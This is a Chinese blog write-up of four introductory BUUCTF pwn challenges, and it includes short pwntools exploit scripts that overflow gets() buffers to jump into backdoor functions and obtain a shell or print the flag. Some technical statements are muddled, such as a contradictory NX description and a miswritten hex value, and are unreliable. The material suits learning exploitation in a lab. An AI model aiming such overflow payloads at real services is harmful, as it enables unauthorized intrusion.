buuctf前四题详解

最新推荐文章于 2024-05-19 10:57:22 发布
最新推荐文章于 2024-05-19 10:57:22 发布
阅读量402 收藏 6
点赞数 6
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_79970561/article/details/135967011
版权

1.test_your_nc

我们首先启动靶机9f27c9d802184ec18042d61d6aac6b11.jpg

 下载文件后放入ida进行静态分析e5bdb748181640f9adcd331df176bcd7.jpg

 点击/bin/sh,点击command,再点击x发现在main函数中530e3e02f9b84948b66b5111819c90c1.jpg

 点击main,再点击f5发现main函数里只有system,直接nc得到flag57049a56b87540f6ae52b1e89b71ef1f.jpg

e2fa8cfe6d8d4be7926c8701dfb7f20e.jpg 

 2.

  • 启动靶机下载文件后,先放入checkec进行检测
  • 我们发现他是一个64位程序,开启了栈不可执行保护,但没有打开NX防护,这说明堆栈可执行,no pie
  • 所以推测为栈溢出漏洞,于是用ida进行分析f4516ccf90254dbd8dc957b5ba7be4ea.jpg

 和上题一样,我们点击/bin/sh,点击command,再点击x,发现在fun函数中f081035dfc764fa38d32ff4426fa6dde.jpg

c9ac1cc445ac43c38d004fb5eb710896.jpg 

 f5看到fun函数,发现system,接下来我们要想办法触发fun函数

那么我们要知道

  • get函数
    gets函数的缓冲区是由用户本身提供,由于用户无法指定一次最多可读入多少字节,导致此函数存在巨大安全隐患。换句话来说,就是gets若没有遇到 \n 结束,则会无限读取,没有上限。
    可以利用缓冲区溢出,将缓冲区填满后跳转到fun函数处,获取shell,进而获取flag

因此我们编写一个exploit来获取flag

具体框架如下

> from pwn import*                  //pwntools函数导入
sh = remote('node4.buuoj.cn',27719) //连接靶机的服务,需要输入对应的ip地址和端口号
#sh = process('./pwn1')             //本地调试
payload = b'a'*23+p64(0x40118A)     //输入payload来进行操作以拿到程序的shell
sh.sendline(payload)  
                                    //sendline() - 发送带回车符的字符串
                                    //sendline() 和 send() 唯一的区别就是在发送的字符串后面加上了回车换行符.
sh.interactive()                    //发送命令进行交互, sh.interactive()允许我们在终端里将命令传送到靶机服务器

ce926d0b494a48db818941f222c40d3f.jpg

 之后我们运行exp,得到flag

4cd2b030143649f7a44d25b93b983a71.jpg

 3.warmup_csaw_2016

我们先检查文件发现是64位,所以我们放入ida64

后门函数中运行的地址为0x000400611

main函数中字符分配到的地址是40到80

我们编写一个exp文件

from pwn import *
p=remote("node4.buuoj.cn",25851)
payload=b'a'*(0x40+8)+p64(0x400611+1)
p.sendline(payload)
p.interactive()
 使用pwn工具

就会直接出现flag

e9d9c89c4cf64c24b2435a67e070d351.jpg

 4.ciscn_2019_n_1

程序经过分析后我们发现是32位程序并且只开启了NX保护,我们放人ida进行静态分析

63446e89e0ab4e7780f341b74289f865.jpg

a60136bab8f54ebca3f32dfd969d6823.jpg和前两题的步骤一样,我们发现 地址在函数func()里

我们打开后门函数记下函数地址0x400676126b9b28aca242799ab8059bdb76b961.jpg

 

 f5发现里面含有system("cat/flag")语句,其作用为输出flag文件信息899eabc7446846e498239d986743378b.jpg

 经过转换后可以得到11.28125对应的十六进制为0x4134800

也可以在ida中查看得到1e709aac92a04710b0a73bc53edd5f41.jpg

 最后编写exp并运行得到flag

2c1a1ef722b348548cc672905a70e9b6.jpg

 a6fdfc249af9488dafff29ddc04227e5.jpg

 以上!

 

FFF.F
关注
  • 6
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
BUUCTF PWN-----第1题:test_your_nc
bing_Max的博客
08-27 1万+
buuoj-----第四题:ciscn_2019_n_1 前言 简单记录一下pwn的过程 首先checkesc ,检测文件的保护机制. 参考链接: link. 参考链接: link. bing@bing-virtual-machine:~/pwn$ checksec test [*] '/home/bing/pwn/test' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found
buuctf--pwn小结1test_your_nc
Xor0ne
06-14 2204
参考链接: 1、BUUCTF刷题(持续更新) 2、BUUCTF-PWN刷题日记 0x01 test_your_nc 参考链接:https://blog.csdn.net/qq_42404383/article/details/103625124 (1)、思路:看名字,然后直接用nc nc的全名是netcat,其主要用途是建立和监听任意TCP和UDP连接,支持ipv4和ipv6。因此,它可以用来网络调试、端口扫描等等。 nc [-hlnruz][-g<网关...>][-G<指向器数目&
pwn基础入门-1.buuctf-test_your_nc
最新发布
weixin_49765221的博客
05-19 531
打开靶机后,我们点击test后 ,会出现复制链接的字样,我们复制链接来到ubuntu中,我们输入wget 粘贴刚才复制的链接,就可以直接将文件下载到ubuntu中,而后直接checksec它当然,也可以点击test下载文件,而后启动靶机,使用ubuntu扫描下载下来的test文件,解题之前需要准备的环境已经在上面的文章中说过了我们将test文件拖入ubuntu系统中,打开终端输入命令:checksec test从图上可以看出它是一个64位程序,开了NX防护(堆栈不可执行)图片内容解释:因为文件内容是64的,
CTF-BUUCTF-Pwn-test_your_nc
热门推荐
qq_42404383的博客
12-19 1万+
CTF-BUUCTF-Pwn-test_your_nc 题目: 解题思路及知识考查: 思路:根据提示,直接NC即可 NC:的使用 nc的全名是netcat,其主要用途是建立和监听任意TCP和UDP连接,支持ipv4和ipv6。因此,它可以用来网络调试、端口扫描等等。 常用语法: nc [-hlnruz][-g<网关...>][-G<指向器数目>][-i<延迟秒数&g...
[buuctf] test_your_nc
0of_blog
05-18 1010
根据题目信息,直接nc靶机地址 他提供的test文件其实没啥用, 不用管,直接nc连上去就行,然后ls查看一下目录,找flag cat /flag flag{59012664-5da3-4e10-b7f9-f52fb9235897}
BUUCTF-test your nc(新手pwner的成长日记)
weixin_58410275的博客
04-22 1610
目录前言一、准备工作1.虚拟机的安装2.pwn环境配置3.一点捷径二、基本思路1.checksec2.IDA分析总结新手上路,还有很多不会的地方,如有错误还请师傅们多多指正。以下内容均为个人自学的理解,不作为专业规范,仅供参考。这道题目在CTF界也被称为瑞士军刀(主要原因在于nc命令的使用,短小精悍,功能实用得此称号)其解题只需要一条简单的nc指令即可。后续的题目不会再只是简简单单利用终端输入指令,需要我们构建exp对靶机“pwn”一下达成我们的目的,这一点我们后续再聊。
嵌入式四级题库详解
08-27
再发干货,嵌入式四级题库详解,本人凭借这东西过得,好东西要分享
图形推理专项突破训练1000题及详解.pdf
12-19
只有多刷题才能找到规律,万变不离其中。加油祝大家成功上岸。图形推理专项突破训练1000题及详解.pdf
中级网络工程师历年真题详解
05-29
2004-2013年中级网络工程师历年真题,含有选择题和下午大题的详细解释
模拟电子技术基础第四版课后习题答案详解
03-17
这份详尽的答案详解无疑是学生们宝贵的参考资料,它不仅覆盖了课本中的习题,还包含了测试题及其答案,帮助学生全面巩固所学。 模拟电子技术是电子工程的基础,它主要研究的是连续变化的电信号处理,涉及放大电路、...
ocp053 206道题详解
04-02
ocp053考前必看,个人亲身经历,考053只看了这200题,考试基本原题,通过率86%。
BUUCTF-PWN-test_your_nc
m0_64180167的博客
04-11 208
有了这个代码 我们的权限就会得到提升,我们就能够查看电脑上的其他文件,获取flag。可以把它理解为一把开启flag宝箱的钥匙。pwn 是为了能够得到最高权限的目的 pwn掉服务器 我们就能获得最高权限 来控制电脑。得到信息 我们把文件放入 ida64。很轻松的就能使用代码ls 来展示文件。得到 文件 与 ip 端口。从这道题我们能理解PWN。并且我们发现flag。
BUUCTF刷题之路-test_your_nc1
qq_30528603的博客
05-25 488
我们看到题目给了IP地址和端口号 直接在Linux上使用nc node4.buuoj.cn 28346得到flag。pwn分类中第一题很简单,就是一个nc,考察的是linux远程链接nc的命令用法,直接使用就能得到flag。也是我们pwn之路的第一步,以后我们打CTF的时候最终都要nc它。
【Pwn | CTF】BUUCTF test_your_nc1
weixin_46301214的博客
01-31 682
nc命令是一个用于网络通信的命令行工具,全称为netcat。以上是nc命令的一些常用用法和参数,需要注意的是,nc命令在不同的操作系统上可能会有一些差异。还记得我以前第一次做pwn题目的时候,是真的懵逼,连接上之后没反应。这题直接连接就可以了,windows装了nc工具,直接耍。这里光标去了下一行,是已经连接上,在等你输入命令呢。下面给一点nc命令的解释,文心一言得出来的。天命:时隔两年,又杀回了pwn这里。然后正常查看 flag 文件就行了。拿到题目的提示,测试你的nc工具。
BUUCTF - PWN】test_your_nc
古月浪子的博客
03-19 1861
只要连上就能有flag from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.log_level='debug' io=remote('xxx',xxx) io.interactive() 附件:test_your_nc ...
BUUCTF-Pwn-test_your_nc
餐桌上的猫
10-31 724
题目截图 从题目描述可以看出,要使用要nc(netcat)命令 先了解一下netcat命令是什么 官网:http://netcat.sourceforge.net/ netcat是一款调试 TCP/UDP 网络连接的利器,常被称作网络调试的瑞士军刀 nc 有以下功能: 模拟 TCP 服务端 模拟 TCP 客户端 模拟 UDP 服务端 模拟 UDP 客户端 模拟 UNIX socket 服务端 模拟 UNIX socket 客户端 端口扫描 传输文件 将服务器 bash 暴露给远程客户端 内网穿透,反向获取
20210913_test_your_nc
m0_51187558的博客
09-13 2955
20210913_test_your_nc 每日一题的第一周,来一起做一道究极入门的pwn题吧。 首先按照网址链接打开题。 题目叫做test your nc,也就是“测试你的nc”。 这看起来像是一个提示–很多ctf题都会把考察的方向作为题目的文件名,以给予做题者一个思路或者学习的方向。但是nc又是什么呢? 我们先把题目文件下载下来,看看具体的东西吧。 从文件管理中我们可以发现我们下载下来的题目叫做test,并且没有任何后缀。 回忆一下,windows系统里是不是几乎所有你看到可以执行的软件的后缀都是e
CTF-BUUCTF-CTF-Misc-二維碼
qq_42404383的博客
12-18 1031
## 题目: 二维码 扫一下得到secret is here ## 分析图片内容 打开kali、用binwalk检测一下 Binwalk + 路径 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-h8j4sdQX-1576673412291)(file:///C:\Users\ADMINI~1\AppData\Local\Temp\ksohtml3328\wps1....
BUUCTF:test_your_nc
Starbright.的博客
01-13 1591
1.直接nc连上去查看目录ls后cat flag(cat用于连接文件并打印到标准输出设备上)
计算机操作系统第四版:课后题详解与关键技术
计算机操作系统第四版课后题答案涵盖了操作系统的核心概念和设计原则。首先,章节一讨论了现代操作系统的主要目标,包括有效性、方便性、可扩充性和开放性。操作系统作为用户与硬件的桥梁,其作用表现在提供用户界面...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值